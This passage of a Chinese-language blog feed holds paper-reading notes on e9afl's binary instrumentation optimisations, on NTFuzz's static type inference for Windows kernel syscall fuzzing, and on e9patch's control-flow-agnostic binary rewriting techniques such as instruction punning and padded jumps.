时触发页错（正常现象），则接下来函数继续执行下面的 trampoline2 时就不再触发页错了，因为 trampoline1 和 2 位于同一块内存区域。</p></li><li><p>instruction selection</p><p>由于上一步优化策略在某些时刻可能不会起作用，例如 patch 时用到了指令双关技术，导致能跳转的 trampoline 地址有限。<strong>这一步的优化策略将尝试在基本块中的其他位置进行插桩，而不只是局限在每个基本块的块首。<strong>e9afl 会搜索</strong>同一基本块中是否存在其它 size&gt;=5byte 的指令</strong>，并对该指令进行插桩。</p><p><img src="/2022/03/other_paper_notes/image-20220302161136498.png" alt="image-20220302161136498"></p></li><li><p>bad block elimination</p><p>如果上面两个步骤的优化都无法完成，则说明相应的 trampoline 大概率会触发 page fault 并降低 fuzz 速度。那么这一步的优化，就主要侧重于<strong>删除一些不必要的 trampoline 插桩</strong>。</p><p>例如，假设通过 BasicBlockA 的所有路径都会通过到 BasicBlockB，那么只需检测这两个块中的其中一个的覆盖信息即可，这属于路径微分问题。</p><blockquote><p>注：e9afl 将那些<strong>无法应用上述两步优化的基本块</strong>，称作为 bad block；反之为 good block。</p></blockquote><p>但在这里 e9afl 更侧重于消减掉 bad block 的插桩，其做法如下：</p><ol><li><p>初始时，按照以下规则为每个基本块打标签：</p><ol><li>为每个 good blocks 初始时打上  unoptimized 标签</li><li>为每个<strong>可能是间接跳转目标</strong>的 bad blocks 初始时打上 unpotimized 标签</li><li>其他 bad blocks 初始时打上 optimized 标签</li></ol></li><li><p>接下来，尝试解决 path differentation problem。对于任意满足以下条件的 sub-paths $\sigma=&lt;A\rightarrow…\rightarrow B&gt;$ :</p><ol><li><code>&lt;A, B&gt;</code> 这一对基本块是 unoptimized</li><li><code>&lt;A,B&gt;</code> 之间的基本块全都是 optimized</li></ol><p><img src="/2022/03/other_paper_notes/image-20220302174125760.png" alt="image-20220302174125760"></p><p><strong>若对于相同的 <code>&lt;A,B&gt;</code>对来说，存在至少两个 sub-paths $\sigma_1、\sigma_2$，则说明违反了 path differentiation 属性，需要对其进行修补</strong>。</p><p>修补方式是：贪心地将 $\sigma_1、\sigma_2$ 中 optimized 的基本块修改为 unpotimized，并一直递归这个过程，直到没有任何 sub-paths 违背了这个属性。</p><p><img src="/2022/03/other_paper_notes/image-20220302175118541.png" alt="image-20220302175118541"></p></li></ol></li></ol><p>最后是 e9afl 的评估效果，可以看到测试效果还是相当不错的，同时 e9afl 也能处理规模较大的文件，例如 chrome：</p><p><img src="/2022/03/other_paper_notes/image-20220302161245744.png" alt="image-20220302161245744"></p><h2 id="五、NTFUZZ-Enabling-Type-Aware-Kernel-Fuzzing-on-Windows-with-Static-Binary-Analysis">五、NTFUZZ: Enabling Type-Aware Kernel Fuzzing on Windows with Static Binary Analysis</h2><p>论文 NTFuzz 提出了一个比较有意思的做法：</p><blockquote><p>通过静态分析技术，将 <strong>documented</strong> 的<strong>用户 API 函数</strong>参数类型信息，传播至 <strong>undocumented</strong> 的<strong>系统调用</strong>参数类型，以弥补这两者之中的信息鸿沟。</p></blockquote><p>通常</p><ol><li>fuzzer 很难在没有参数类型信息的情况下，很好的 fuzz 或触发 bug</li><li>undocumented 的系统调用通常会和 documented 的 API 函数相关联</li><li>尽管 API 函数最终会进行系统调用，但 API 函数级别的 fuzz 不大可能会触发到 bug。这应该是因为 API 函数会事先对参数做一些过滤操作。</li></ol><p>以下是 NTFuzz 的架构图，其中主要分为静态分析和动态内核 fuzzer 两部分：</p><p><img src="/2022/03/other_paper_notes/image-20220307203406916.png" alt="image-20220307203406916"></p><p>其中比较关键的是静态分析器中的 Modular Analyzer，以 <strong>Function</strong> 为一个基本的分析单位，其基本算法思路如下：</p><p><img src="/2022/03/other_paper_notes/image-20220307204928524.png" alt="image-20220307204928524"></p><p>初始时，输入 CFG、调用图、API描述。之后对 callGraph 使用<strong>拓扑排序</strong>，<strong>自底向上</strong>的去遍历每个函数（即先分析 callee，再分析 caller）。这样做的目的是为了可以在分析调用图上层函数时，直接使用先前已分析好的下层函数 summaries，降低时间开销。每次执行 summarize 操作分析函数时，会记录下<strong>这个函数所调用的 syscall</strong>，以及其<strong>内存状态的变动情况</strong>。</p><p>但这种函数分析顺序无法处理<strong>递归调用</strong>和<strong>间接调用</strong>两种情况，因此 NTFuzz 只是简单的将其省略。除此之外，静态分析器还必须能够</p><ul><li>跨函数追踪数据流。</li><li>追踪过程间的内存状态。例如可能某个内存位置在某个函数中被修改，然后用到了另一个函数中去，那么这种使用情况就必须能够追踪的到。</li></ul><p>接下来我们来重点看看静态分析器的三个部分：</p><ul><li><p>Front-end</p><p>前端主要做了几件事情：读入 API 描述；将二进制文件解析成基本的 IR 语句并生成 CFG。其中，API 描述主要靠 Windows SDK 来获取，其代码内部的<strong>结构化注释</strong>也能很好的为 NTFuzz 提供类型信息。除此之外，解析出的 IR 省略了很多与类型信息或内存状态变动无关的 opcode，只留下了几个较为重要的：</p><p><img src="/2022/03/other_paper_notes/image-20220307210748554.png" alt="image-20220307210748554"></p><p>有意思的是，这之中省略了一元运算符和分支跳转等指令。这可能是因为一元运算符通常不涉及内存修改，而分支跳转信息也会保存在所建立的 CFG 边上。</p><p>为了减小静态分析的 callGraph 大小，NTFuzz 先从带有 sysenter 指令的 syscall stub 函数开始，<strong>自底向上</strong>分析一个个函数的<strong>caller</strong>，直到遇到<strong>第一个 documented 的 API 函数</strong>，这样分析出来的函数集合称为 S1。但需要注意的是只分析 S1 是不够用的，因为这里面并没有包含其它<strong>可能会被 S1 中函数所调用的</strong>修改内存状态函数，因此在分析出 S1 后，还需要从 S1 函数集合出发，分析那些<strong>所有会被 S1 中函数所调用到的函数集合</strong> S2。这样处理后，<strong>S1 + S2 集合</strong>便是 NTFuzz 需要进行静态分析的<strong>目标函数集合</strong>。</p></li><li><p>Modular Analyzer</p><p>整篇文章中最重要的部分就在这一小节中。</p><p>这一部分将会对目标函数集合依次执行 summarize 操作。整体上，该阶段会用到<strong>流敏感</strong>静态分析技术，这也是为了更好的支持指针分析技术。正如先前所说，这一步会记录下<strong>每个函数传递给 syscall 的参数值</strong>（注意这个值是抽象的，并非绝对的值），以及在<strong>函数进入和退出前后其内存状态的改变情况</strong>。具体来说，这步分为两个部分：<strong>抽象域(abstract domain)</strong> 和<strong>抽象语义(abstract semantics)</strong>。</p><p>抽象域（Abstract Domain），个人认为是用于在为函数提取 summary 时，指定其中某些变量或值的范围。其定义的抽象域主要有以下几种：</p><p><img src="/2022/03/other_paper_notes/image-20220307222341920.png" alt="image-20220307222341920"></p><p>乍一看有亿点点复杂（实际上刚接触确实比较复杂），需要一点一点的啃。</p><ol><li><p>集合 Z，表示的是整数集合。（就是高中数学的那个 Z 集合）</p></li><li><p>集合 I，表示抽象的整数集合。先引入一下 symbol 的概念，<strong>symbol</strong> 表示每个函数参数所引入的一个新的符号。因为我们在静态分析阶段没法确定各个函数调用的参数具体是什么值，因此需要用个符号来代替，有点类似符号执行的思想。例如</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">func</span><span class="params">(<span class="type">int</span> a )</span> </span>&#123;</span><br><span class="line">   <span class="type">int</span> b = a*<span class="number">3</span><span class="number">+1</span>;</span><br><span class="line">   <span class="keyword">return</span> b;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>此时在静态分析阶段，我们可以粗略的认为参数 a 的数值为一个 symbol $\alpha$，那么变量 b 的数值便是 $\alpha * 3 +1$。</p><p>因此，我们可以使用 $a*symbol+b$ 的形式来表示一个符号整数。当 a 为 0 时，则表示一个具体整数；a 不为 0 时，则表示一个符号整数。</p><p>比较有意思的是符号整数还并上了一个<strong>倒T</strong>和<strong>正T</strong> 集合后，才构成抽象整数集合 I。其中，</p><ul><li>倒T 表示的是<strong>没有实际分析意义的整数</strong>集合。</li><li>正T 表示的是<strong>任意一个整数</strong>集合。</li></ul><p>这里给出了倒T和正T 与普通整数的相加操作：</p><p><img src="/2022/03/other_paper_notes/image-20220307223812099.png" alt="image-20220307223812099"></p><blockquote><p>因为倒T集合中的元素没有实际分析意义，因此如果倒T集合与一个有<strong>分析意义</strong>的 i 相加，则保留 i。</p><p>由于正T表示的是任意整数集合，因此任意整数集合与其他整数相加，则仍然为一个任意整数集合，即正T集合。</p><p>个人猜测这种加法所保留的结果，会更偏向于保留更有意义的集合。其优先级排序大体为 $正T &gt; i &gt; 倒T$。</p></blockquote><p>接下来我们来简单看看两个符号整数相加的结果：</p><p><img src="/2022/03/other_paper_notes/image-20220307224215299.png" alt="image-20220307224215299"></p><p>可以看到，只有在一些非常限制的条件下，两个符号整数相加才能得到确定的结果，否则其结果集合将非常的大，用 正T 集合来表示。</p></li><li><p>集合 V，表示函数中某个值的抽象。我们可以使用三个集合来确定一个变量的属性，分别是<strong>抽象值集合</strong>（数值取哪些），<strong>抽象位置集合</strong>（该变量存到了哪里），以及<strong>抽象类型集合</strong>（这个值的类型可以是哪些）。对于某个特定的抽象值 V 来说，<strong>使用三元组表示</strong>，其可选的数值是 <strong>集合I的子集</strong>；可选的内存位置是集合L<strong>幂集</strong>的子集；可选的类型是集合T<strong>幂集</strong>的子集。<br>因此对于整个抽象值集合V来说，V的集合范围便是 <strong>集合 I x 集合L幂集 x 集合T 幂集</strong>。</p><blockquote><p>注意，$2^T$ 表示集合 T 的幂集。</p></blockquote><blockquote><p>内存位置用幂集子集来表示，是因为一个指针在静态分析时可能会指向多个内存位置；类型同理。</p></blockquote></li><li><p>集合L，表示抽象内存位置集合。抽象内存位置可能有以下几种：</p><ol><li><p>全局变量区某个固定的位置，因此用 $Global(Z)$ 表示所有可能的全局变量集合</p></li><li><p>栈区某个固定位置，用二元组 (f, o) 表示函数 f 栈帧上相对偏移为 o 的位置，因此用 $Stack(function\space *\space Z)$ 表示所有可能的栈变量位置集合；堆区同理，不过堆区用的是 (a, o) 表示堆变量位置，表示地址 a 上相对偏移为 o 的位置。</p><blockquote><p>上面这些都表示的是静态分析中相对较为固定的内存位置。</p></blockquote></li><li><p>除了上面几种以外，还有一种内存位置是需要考虑的：符号指针 s 和指针偏移量为 o 的内存位置，用 SymLoc(s, o) 来指定抽象内存位置。</p></li></ol></li><li><p>集合T，表示类型<strong>约束</strong>集合。对于一个变量来说，其类型，要么是一个确定的类型，要么就和 symbol 类型一样。注意这里是<strong>约束</strong>的集合，因此如果某个类型的约束集合为空，则表示可以为<strong>任何类型</strong>。</p></li></ol><p><strong>抽象语义（Abstract Semantics）</strong>，个人认为是对 expr 或 stmt 具体干了什么做了一个描述。要理解这个得先把先前说的 IR 搬过来：</p><p><img src="/2022/03/other_paper_notes/image-20220307210748554.png" alt="image-20220307210748554"></p><p>现在我们再来尝试理解对 expr 的 evaluation，一个一个来：</p><p><img src="/2022/03/other_paper_notes/image-20220307233508336.png" alt="image-20220307233508336"></p><blockquote><p>其中，$V$表示的是，在抽象状态 $S$ 下，给定一个 $expr$  ，返回其表示的 Abstract Value。</p></blockquote><p>我们先看看什么是抽象状态 S：</p><p><img src="/2022/03/other_paper_notes/image-20220307233801692.png" alt="image-20220307233801692"></p><p>我们可以很容易的知道，抽象状态 S 保存了<strong>寄存器-&gt;V 的映射关系</strong>，以及<strong>内存位置 L -&gt; V 的映射关系</strong>，这样的<strong>一个二维元组</strong>。简单来说，一个 State 保存了所有关于值的东西，即所有寄存器对应的值和所有内存位置对应的值。</p><blockquote><p>因此，我们用 S[0] 来表示状态 S 下寄存器的映射关系 R，S[1] 表示状态 S 下内存位置的映射关系 M。</p></blockquote><ul><li>$V(reg)(S)$：这个公式是比较好理解的。对于状态S，若传入一个 reg，则会先获取状态 S 下的寄存器映射关系 R（即 S[0]），之后使用 reg 作为该映射关系的键，获取其值。</li><li>$V([e])(S)$：对于状态S，若传入一个表达式 $e$，则返回 e 所对应的内存位置上的值。这个公式等号后面的内容要拆开看。首先，我们需要获取表达式 e 所对应的 Abstract Value，即 $V(e)(S)$。返回的 Abstract Value 是一个三元组，其第1个 field 为 Memory Location（下标从0开始），因此 $V(e)(S)[1]$表示<strong>表达式 e 所有的内存位置集合</strong>。最后便是尝试访问在状态 S 下，其 Abstract Value 的所有内存位置，即 $\bigcup {S[1][l] | l \in V(e)(S)[1]}$</li><li>$V(i)(S)$ ：对于状态 S，获取整数表达式 $i$ 所对应的 Abstract Value。<ul><li>当 $i=0$ 时，我们无法区分 i 是整数 0 还是空指针 NULL，因此只能忽略其类型约束。</li><li>当 $i \in DataSection$，则我们可以确定 i 是一个指向全局变量的指针值。因为 i 所指向的数值并非我们所关心的，因此用倒 T 表示。</li><li>其他情况下则认为 i 是一个普通整型。</li></ul></li><li>$V(e_1*e_2)(S)$：对于状态 S，获取其二元操作后的值。有个特殊的点在于，对于<strong>操作数组元素</strong>时，<strong>被操作的数组元素的 Memory Location，会被设置为 Array Base Memory Location</strong>，而不是精确的数组元素位置。这是为了防止索引范围爆炸所导致的内存位置爆炸。</li></ul><p>接下来我们再试着理解 Stmt 的 evaluation：</p><p><img src="/2022/03/other_paper_notes/image-20220308084738528.png" alt="image-20220308084738528"></p><p>其中，$m[k \rightarrow v]$ 表示<strong>把 m 从映射 k 强更新为 v</strong>；箭头上打个 w 表示是<strong>弱更新</strong>。在了解完 expr 相关的表达式后，我们可以较为容易的理解 Put、Store 和 update 原语，因此不再赘述。而对于 Call 原语来说，由于调用的函数可能会产生副作用（例如修改内存等等），因此需要额外处理。</p><p>这里，将一个函数的副作用定义为一个二元组，这样的二元组可以保存 <strong>什么样的参数导致什么样的内存修改</strong> 的信息：</p><p><img src="/2022/03/other_paper_notes/image-20220308091612142.png" alt="image-20220308091612142"></p><p>而 apply 操作所要做的事情，就是将 Side Effect 中的 Update Set，apply 进状态 S 中：</p><p><img src="/2022/03/other_paper_notes/image-20220308092314488.png" alt="image-20220308092314488"></p><p>apply 原语中有个<strong>倒 L 符号</strong>，个人理解是，将某个函数对某个内存位置上的值，映射为另一个函数上另一个内存位置上的值。这么说有点拗口，举个简单的例子：caller 有个变量，位于 $STACK(caller, -0x40)$，而 callee 则会访问 $STACK(callee, -0x80)$（caller 的局部变量），虽然看上去两个函数使用了不同的内存位置，但本质上这两个都指向的是<strong>同一个内存位置</strong>，因此需要做一个映射代换，那么<strong>倒L符号</strong>起到的就是这个<strong>替换</strong>作用。</p></li><li><p>Type Inferrer</p><p>类型推断器将会使用上一步所生成出的 summary 进行类型推断。难点在于<strong>结构体类型</strong>和<strong>数组类型</strong>推断。</p><p>首先是<strong>结构体类型推断</strong>。对于位于堆上的结构体来说，Inferrer 可以通过分析堆块所对应的状态来得出；但对于位于栈上的结构体来说，由于<strong>不像堆块那样隐含着边界信息</strong>，因此其他 field 可能会被误认为是其他的局部变量，很难去区分开到底栈上结构体中有哪些 field：</p><p><img src="/2022/03/other_paper_notes/image-20220308102221825.png" alt="image-20220308102221825"></p><p>NTFuzz 在这里提出了一种启发式策略：通过函数中的内存访问模式，来判断某个栈变量是否为结构体中的一部分。</p><p>通俗的说，若某个<strong>相邻栈变量</strong>在初始化后<strong>从未使用</strong>，则说明这个变量是栈结构体中的一部分，将会被传递给 syscall；若这样的变量连初始化操作也没有，则说明这样的变量将会被 syscall 初始化。</p><p>其次是<strong>数组类型推断</strong>。数据类型分为两部分：数组元素类型和数组大小。其中数组元素类型可以通过 documented API 来获取；而数组大小可以通过 SAL 注释或者 API 参数的 size 参数来获取，以及还可以通过观察<strong>内存分配模式</strong>来获取。</p><blockquote><p>有相当一部分 API 中的参数包含了数组指针和数组大小两部分，因此可以通过分析这些 API 来获取大小。</p></blockquote></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;p&gt;这里存放阅读论文/读代码时所记录下的一些&lt;strong&gt;零碎&lt;/strong&gt;笔记。&lt;/p&gt;
&lt;p&gt;由于这部分活动在记录笔记时，出于时间与重要性考虑，只会记录下较为重要的一部分，不会完整记录，因此单篇笔记的篇幅不会太长。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;原先是想着把这些随笔放到周报里去，但是这会打乱周报的排版，思来想去还是想单独立一篇文章出来。&lt;/p&gt;
&lt;/blockquote&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="paper" scheme="https://kiprey.github.io/tags/paper/"/>
    
  </entry>
  
  <entry>
    <title>《Binary Rewriting without Control Flow Recovery》论文笔记</title>
    <link href="https://kiprey.github.io/2022/02/e9patch/"/>
    <id>https://kiprey.github.io/2022/02/e9patch/</id>
    <published>2022-02-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.997Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、概述">一、概述</h2><p>二进制重写技术在很多场景下都有大用，例如修复、加固、插桩、打补丁、调试等等。而大部分二进制重写技术都依赖于从输入二进制中<strong>恢复控制流信息</strong>，这是因为这些二进制重写技术通常都涉及指令移动等等，这就必须调整其他跳转指令的相对跳转偏移，即修复<strong>跳转目标集</strong>。</p><p>但问题在于，<strong>从二进制文件中恢复控制流信息是相当困难的</strong>：</p><ul><li>一种方法是<strong>依赖于特定的二进制元数据</strong>，例如调试符号来恢复重定位信息，但并非所有二进制都会包含这类元数据（strip）</li><li>另一种方法是<strong>使用静态二进制分析技术</strong>来恢复，但通常效果不佳，而且不能应用于大小较大的二进制文件。</li></ul><p>因此大部分二进制重写技术都依赖于一组甚至多组假设，例如特定编译器、特定编程语言等等。这样一来这些二进制重写技术都存在着局限性，难以扩展，同时也没办法处理大型程序，比如 chrome。</p><p>这篇论文向我们展示了一种基于 <strong>x86_64</strong> 的二进制重写技术，称为 e9patch。其中，<code>e9</code> 表示的是 <code>jmpq rel32</code> 的 opcode：0xe9。这种二进制重写技术的优点在于<strong>控制流无关</strong>（<strong>control flow agnostic</strong>），即<strong>无需任何控制流信息的知识</strong>。其二进制重写方法保留了跳转目标集，无需控制流恢复。因此， 这个工具相当的鲁棒，而且还可以 patch 诸如 chrome 等等大小大于 100MB 的二进制程序。</p><p>除了普通的二进制程序以外，e9patch 还可以为 shared objects 或 libraries 打补丁。</p><span id="more"></span><h2 id="二、背景">二、背景</h2><p>控制流无关的二进制重写技术无需知道跳转目标集，它把每一条指令都当作潜在的跳转目标，并在控制流执行到该指令时，<strong>保留该指令的语义</strong>（注意，这里保留的是指令的语义，而不是原始指令）。即二进制中所有的指令满足以下三个条件中的任意一个:</p><ul><li>原始指令的保留</li><li>替换为操作上等效的指令</li><li>替换为执行特定目的的指令，例如修复和插桩等等</li></ul><p>以下是几种控制流无关的二进制重写技术，e9patch 将在这些技术的基础上进行扩展。</p><h3 id="B0-int3-断点">B0: int3 断点</h3><p>这应该是原理最简单的技术。通过把特定指令 patch 成 int3 断点，当控制流执行到此处时便会触发 SIGTRAP，此时控制流被信号处理例程接管（在某些用途下甚至是调试器接管，例如 trapfuzz），这样一来要 patch 的工作便可以在信号处理例程中进行。</p><p>其缺点是：性能开销很大。中断和信号处理例程的切换，会涉及到用户-内核层上下文的切换，时间开销可能会上一个数量级。</p><h3 id="B1-Jumps">B1: Jumps</h3><p>这种方式会将目标指令替换成一条 <code>jmpq rel32</code> 指令，使得控制流在执行到此处时，跳转至 trampoline 里，之后在 trampoline 中执行 patch 的指令，并在需要时执行原先被 patch 的那条指令。这种方法的一个应用场景是 inline hook：</p><p><img src="/2022/02/e9patch/CodeFlow.png" alt="img"></p><p>但这种方法同样存在着局限性。对于 <code>jmpq rel32</code> 指令来说，该指令的大小为 5 个字节。如果待 patch 的指令其指令大小<strong>大于等于5个字节</strong>，则直接将 jmpq 指令替换上去，此时这种重写技术还是<strong>控制流无关</strong>的。</p><p>但问题在于，如果待 patch 的指令小于 5 字节呢？以上图为例，将 <code>mov edi, edi </code> 指令替换成 <code>jmpq</code> 后，会一并覆盖掉下面两条指令。如果该函数中存在某条 jmp 指令跳转至被覆盖的那两条指令，则会触发异常，因为跳转目标的 opcode 已经被纂改。</p><h3 id="B2-Instruction-Punning">B2: Instruction Punning</h3><blockquote><p>这个技术要重点说明一下，因为 e9patch 是基于这项技术进行的扩展。</p></blockquote><p>除了上述两种方法以外，还有一种方法是专门处理一种<strong>可以与其他指令安全重叠的 jmpq 指令</strong>，这种方法称为 指令双关(Instruction Punning)。基本思想是<strong>找到与任何重叠指令共享相同字节表示的相对偏移量值</strong>，之后使用该相对偏移量，用 <code>jmpq</code> 指令安全地替换被 patch 的指令。</p><p>举个简单的例子，:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">mov</span> %rax, (%rbx)</span><br><span class="line"><span class="keyword">add</span> <span class="number">$32</span>, %rax</span><br></pre></td></tr></table></figure><p>对应到机器码便是下图中的 original：</p><p><img src="/2022/02/e9patch/image-20220224094232075.png" alt="image-20220224094232075"></p><p>假设我们需要 patch 掉 <code>mov $rax, (%rbx)</code>，instruction punning 便可以重用下条指令的前两个字节（0x48 0x83），使得在 patch 点凑出了一个五字节的 jmpq 指令（ <code>jmpq 0x8348xxxx</code>），同时避免修改下条指令的 opcode。</p><p>这样，当控制流执行到 <code>mov</code> 指令所对应的位置时，控制流便可以进行 jmpq 跳转。同时如果存在其他指令需要跳转至 add 指令时，add 指令也可以很好的工作，因为 add 指令的 opcode 并没有修改。</p><p>指令双关中的这个双关，指的是下条指令中的 <strong>opcode</strong>，<strong>既可以表示该指令，又可以表示 jmpq 的部分偏移量</strong>。</p><p>但这种方法同样存在局限性。注意到 jmp 中的相对跳转偏移高地址两个字节<strong>已经被下个指令的 opcode 给定死了</strong>。因此可跳转的内存空间被局限住了，只能相对跳转至相对偏移在 <code>0x83480000~0x8348ffff</code> 这个范围内的内存空间。这个范围的内存空间并非总是可用的，有可能这个范围正对应于：</p><ul><li>另一个 trampoline 的内存区域</li><li>其他代码段或数据段</li><li>无效地址范围，例如 NULL 或下溢至负地址范围</li></ul><p>以这个图为例，相对偏移量 0x8348xxxx 实际上是一个负数（32位偏移）。当相对偏移量为负数时，实际跳转至的位置可能在 NULL 周围甚至下溢至负地址范围，而这部分内存空间可能很难 mmap 到。</p><p>因此，指令双关技术只能给部分指令打上 patch，可 patch 的覆盖率不高。</p><h2 id="三、设计">三、设计</h2><p>e9patch 基于上面 B1/B2 的方法，做了一系列改进。在说明具体改进之前，我们先说明该工具所基于的假设：</p><ul><li>被 patch 的指令不能被<strong>自读取</strong>（例如自校验）或<strong>自写入</strong>。</li><li>instrument 或 patch 是用户透明的，即程序行为不会通过某种侧通道（例如计时器、文件描述符等）而发生更改。</li><li>输入二进制本身没有使用指令覆盖或指令双关技术。</li></ul><p>可以看到这里的假设相对于先前说的依赖编译器、依赖特定语言、依赖二进制元数据等放宽了很多，e9patch 都不依赖这些东西。</p><p>e9patch 并不内嵌反汇编器，而是靠用户来输入目标程序的指令信息（例如指令相对偏移和指令大小等等）。这样做的目的是为了实现更好的灵活性，用户可以在只知部分指令信息的情况下完成<strong>局部插桩</strong>，提高效率；而且还便于 e9patch 嵌入其他的设计中。</p><p>接下来我们来讲讲 e9patch 所提供的三种新策略。这里我们看看基于以下指令的一个示例：</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">Ins1:</span> <span class="keyword">mov</span> %rax, %(<span class="built_in">rbx</span>)</span><br><span class="line"><span class="symbol">Ins2:</span> <span class="keyword">add</span> <span class="number">$32</span>, %rax</span><br><span class="line"><span class="symbol">Ins3:</span> <span class="keyword">xor</span> %rax, %rcx</span><br><span class="line"><span class="symbol">Ins4:</span> cmpl <span class="number">$77</span>, -<span class="number">4</span>($<span class="built_in">rbx</span>)</span><br></pre></td></tr></table></figure><p>为了便于说明，这里给出几种假设：</p><ol><li><p>假设要 patch 的指令是 Inst1</p></li><li><p>假设<strong>相对跳转偏移为负数</strong>时所对应的内存空间是无效的，即不可分配。</p><blockquote><p>因此先前介绍的 Instruction Punning 技术不可用，因为其相对跳转偏移为负数。</p></blockquote></li></ol><h3 id="T1-Padded-Jumps">T1: Padded Jumps</h3><p>通常 jmpq 的机器码长度为 5 个字节：1 字节的 opcode 和 4 字节的相对偏移。而实际上，还存在一种方法可以使用更多字节来对 jmpq 进行编码：<strong>使用冗余指令前缀形式的额外字节</strong>来填充跳转指令。</p><p>x86_64 中存在一些<strong>不会影响相对跳转指令语义</strong>的指令前缀，例如 REX 前缀、段重写前缀 (es,ss等等) 以及操作数重写前缀(0x66)。在这个例子中，我们可以使用指令前缀来对 jmpq 指令进行填充，以将相对偏移的字节表示向高地址处移动。</p><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>图中 T1(a) 使用了一个指令前缀 REX (0x48) 进行填充，填充后的 jmpq 范围为 <code>0xc08348XX</code>。由于该偏移量为一个负数值，因此不能使用，需要继续填充。</p><p>这里 e9patch 在 T1(a) 的基础上填充了段重写前缀 es (0x26)，填充后即为 T1(b) 的效果。可以看到此时 T1(b) 中 jmpq 的相对跳转指令为 0x20c08348，不再是个正数，因此该 jmpq 大概率可以跳转至一个可被分配的内存空间。</p><p>通过上面的这个例子我们可以看到策略 T1 的优点、缺陷和特性：</p><ul><li><p>优点：可以通过额外写入一些指令前缀，来发现并使用新的有效相对跳转偏移</p></li><li><p>缺点：T1 适用性依赖于指令长度。如果指令长度较短，则 T1 能进行补丁尝试的次数将较少。这也意味着 T1 不能适用于单字节指令的 patch。</p></li><li><p>特性：每一次新的补丁尝试将会缩小 trampoline 可操作的内存地址范围。例如:</p><ul><li>B2 相对跳转的可操作内存范围：<code>0x83480000~0x8348ffff</code>（范围：0x10000字节）</li><li>T1(a)：<code>0xc0834800~0xc08348ff</code>（范围：0x100字节）</li><li>T1(b): <code>0x20c08348</code>（范围：0字节）</li></ul><p>这之所以被我归类到特性而非缺点，是因为 e9patch 只会在当前前缀所对应的内存空间不满足使用条件时才会继续增加前缀。不满足条件的内存空间范围再大也没有什么用处。</p></li></ul><h3 id="T2-Successor-Eviction">T2: Successor Eviction</h3><p>如果使用 T1 方法时，再怎么 padding Ins1 也不存在可用的跳转偏移该怎么办？是不是可以尝试修改 Ins2 前几个字节的数据来对 Ins1 patch 提供条件？接下来就要介绍另一种策略，称为后继指令驱逐。其思路是：</p><ol><li><p>将相邻指令 Ins2 驱逐，换成一条 jmpq 指令。</p></li><li><p>这条 jmpq 指令跳转至一个 trampoline2 上执行原有的 Ins2 指令，之后再调回来继续执行 ins3 即接下来的指令</p></li></ol><blockquote><p>注：将被驱逐的指令为 victim。</p></blockquote><p>这样一来，Ins2 指令所对应的语义并没有被修改（因为 Ins2 确实被执行，与先前相比只是是在 trampoline2 中执行，同时多了两次跳转操作：调至 trampoline2 再跳回来）。但 Ins2 指令所在的内存地址，其上面的字节表示确确实实的发生了修改。这样一来，Ins1 便可以再次尝试使用 T1 策略来进行 patch，patch 成功后便可跳转至 trampoline1 中执行其他操作。</p><blockquote><p>注意，两个 trampoline 是不一样的。</p></blockquote><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>整个思路可以精简成：</p><blockquote><p>尝试使用 T1 策略，发现 T1 策略无法 patch Ins1。为了修改 Ins1 所依赖的那些 Ins2 上的机器码，e9patch 先尝试使用 T1 策略来 patch Ins2。等 Ins2 patch 成功后，再来对 Ins1 重试 T1 策略。</p></blockquote><p>整个过程仍然保证：</p><ol><li>Ins2 的语义与原先一致</li><li>程序跳转目标集不变</li></ol><h3 id="T3-Neighbour-Eviction">T3: Neighbour Eviction</h3><p>如果相邻的指令不满足 patch 条件，同时 Successor Eviction 也不起作用，那该如何呢：</p><ol><li><p>e9patch 会继续向后面找可用的机器码序列，作为其相对跳转偏移 rel32（高地址方向）</p></li><li><p>找到后，就会在这里原地创建一个 jmpq 指令，即 T3(a)。</p></li><li><p>之后，在被 patch 指令上 patch 一个相对短跳指令，跳转至这个新的 jmpq 指令处，也就是 T3(b)。</p></li><li><p>注意到 Ins3 的机器码因为第二步的 patch 被修改。因此这里同样需要对 Ins3 做一个 patch 操作，patch 一个 jmpq 上去，使其跳转至 trampoline 执行 Ins3 指令。</p><p>这样便可保证修改后与修改前 Ins3 指令的<strong>语义</strong>保持不变。（T3©）</p></li></ol><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>T3 策略虽然较为复杂，但其功能较为强大，其关键之处在于 victim 的数量。假设指令平均长度为 4，那么短跳转大概可以跳转至 64 个潜在的 victim，因此大多情况下至少能找到一个合适的 victim，这个策略也将可 patch 指令的覆盖率提高至将近 100%。</p><p>以下是 T3 策略的示例：</p><p><img src="/2022/02/e9patch/image-20220224144643001.png" alt="image-20220224144643001"></p><h3 id="S1-Reserve-Order-Patching">S1: Reserve Order Patching</h3><p>上面说的这些情况针对的都是 patch 单个指令的情况。但在实际情况中，通常用户可能会要求<strong>连续 patch 多条指令</strong>。</p><blockquote><p>这里指的连续 patch 多条指令，<strong>不是指</strong>将这连续的指令 patch 成<strong>一个</strong> trampoline jmp，而是指将连续指令的<strong>每一条</strong>指令都 patch 成<strong>多个</strong> trampoline jmp。</p></blockquote><p>我们再来看看这张图：</p><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>假设用户要将 Ins1 patch 成一个 trampoline1 jmp、Ins2 patch 成一个 trampoline2 jmp。那么如果我们先 patch Ins1 的话（T1(b)），可以看到 patch 后的 trampoline1 jmp 